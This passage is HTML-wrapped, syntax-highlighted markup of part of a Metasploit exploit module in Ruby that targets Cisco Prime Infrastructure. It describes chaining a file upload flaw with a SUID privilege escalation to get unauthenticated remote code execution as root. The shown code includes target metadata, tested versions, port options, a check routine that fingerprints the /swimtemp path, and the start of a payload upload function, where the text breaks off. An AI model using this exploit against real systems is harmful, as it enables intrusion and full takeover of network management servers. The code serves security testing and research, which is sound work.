class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">attacker <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">achieve <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-v\">execution<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-e\">flaw <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-19\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">upload <\/span><span class=\"crayon-e\">vulnerability <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">allows <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">attacker <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">upload <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-e\">files <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">Apache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-20\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Tomcat <\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">second <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">privilege <\/span><span class=\"crayon-e\">escalation <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">bypassing <\/span><span class=\"crayon-e\">execution <\/span><span class=\"crayon-e\">restrictions<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-21\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SUID <\/span><span class=\"crayon-v\">binary<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">module <\/span><span class=\"crayon-e\">exploits <\/span><span class=\"crayon-e\">these <\/span><span class=\"crayon-e\">vulnerabilities <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">achieve <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-e\">execution<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-24\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">CPI <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">installation<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">module <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">been <\/span><span class=\"crayon-e\">tested <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-i\">CPI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.2.0.0.258<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.4.0.0.348.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Earlier <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">later <\/span><span class=\"crayon-e\">versions<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-27\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">might <\/span><span class=\"crayon-e\">also <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">affected<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">although<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.4.0.0.348<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">latest <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">time <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-v\">writing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Author&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Pedro Ribeiro&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Vulnerability discovery and Metasploit module<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;License&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MSF_LICENSE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;References&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;CVE&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TODO&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;CVE&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TODO&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;URL&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TODO&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;URL&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TODO&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Platform&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;linux&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Arch&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ARCH_X86<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARCH_X64<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Targets&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Cisco Prime Infrastructure&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Privileged&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DefaultOptions&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;WfsDelay&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DefaultTarget&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DisclosureDate&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TODO&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptPort<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;RPORT&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;The target port&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">443<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptPort<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;RPORT_TFTP&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TFTPD port&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">69<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptBool<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;SSL&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Use SSL connection&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptString<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;TARGETURI&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;swimtemp path&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/swimtemp&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-60\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-61\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-63\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">check<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-64\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_request_cgi<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;uri&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">normalize_uri<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;TARGETURI&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;swimtemp&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;method&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;GET&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">404<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># at the moment this is the best way to detect<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># a 404 in swimtemp only returns the error code with a body length of 0,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># while a 404 to another webapp or to the root returns code plus a body with content<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">CheckCode<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Detected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-73\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">CheckCode<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Unknown<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-75\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-76\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-77\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-79\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">upload_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 